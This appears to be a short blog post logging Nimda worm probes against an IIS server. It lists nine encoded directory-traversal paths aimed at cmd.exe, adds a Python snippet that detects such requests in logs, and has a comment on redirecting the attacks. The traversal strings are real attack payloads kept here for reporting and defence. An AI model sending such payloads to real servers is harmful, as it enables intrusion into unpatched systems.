Worm!
My Windows (IIS) box was under worm attack! The worm was Nimda and it had already generated about 215 hits.
Apparently it was trying to find my cmd.exe so as to take control of my Windows box. A few samples appeared in the Error 404 statistics:
- /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /exchange/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /_mem_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /_vti_bin/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /exchange/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /cgi/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /PBServer/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe
- /cgi/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe
- /scripts/..%5c..%5cwinnt/system32/cmd.exe
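
An added example, not part of the original post: a small Python check that flags requests like the ones listed above by percent-decoding the URI (repeatedly, so nested encoding does not hide the separator), folding backslashes to slashes, and looking for a `..` segment in a path that ends at cmd.exe. The log layout, client addresses and function names are assumptions made for this sketch; the probe URIs are copied from the 404 list.

```python
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in a simplified "client method uri status" layout
# (an assumption, not a real IIS log format). Probe URIs come from the list above.
SAMPLE_LOG = """\
192.0.2.10 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
192.0.2.10 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
192.0.2.10 GET /cgi/check.bat/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
198.51.100.7 GET /index.html 200
198.51.100.7 GET /docs/cmd.exe-history.html 200
203.0.113.5 GET /_vti_bin/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
"""

MAX_DECODE_ROUNDS = 3  # assumption: a small bound on repeated decoding


def normalize(uri: str) -> str:
    """Drop the query string, percent-decode until stable, fold '\\' and case."""
    path = uri.split("?", 1)[0]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def is_cmd_traversal(uri: str) -> bool:
    """True when the path contains a '..' segment and its last segment is cmd.exe."""
    segments = normalize(uri).split("/")
    return ".." in segments and segments[-1] == "cmd.exe"


def probes_by_client(log_text: str) -> Counter:
    """Count traversal probes per client address; malformed lines are skipped."""
    hits = Counter()
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 4 and is_cmd_traversal(fields[2]):
            hits[fields[0]] += 1
    return hits


if __name__ == "__main__":
    for client, count in probes_by_client(SAMPLE_LOG).most_common():
        print(f"{client}\t{count} traversal probe(s)")
```

Matching on the decoded path rather than the raw `%5c` string means the same rule covers every directory prefix in the list without enumerating them.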
1 Comments:
At 5/26/2005 07:44:00 am, Gary W. Longsine said…
Attacks like these persist on the internet. I've seen Apache users who use re-write rules to redirect these attacks to /dev/null on UNIX systems, and one person with a sense of humor who redirected them to microsoft.com. That's rude, but really pretty funny, in a slipped-on-a-banana-peel sorta way. I probably shouldn't admit that.
/gary
Intrinsic Security: AntiWorm Defense In Depth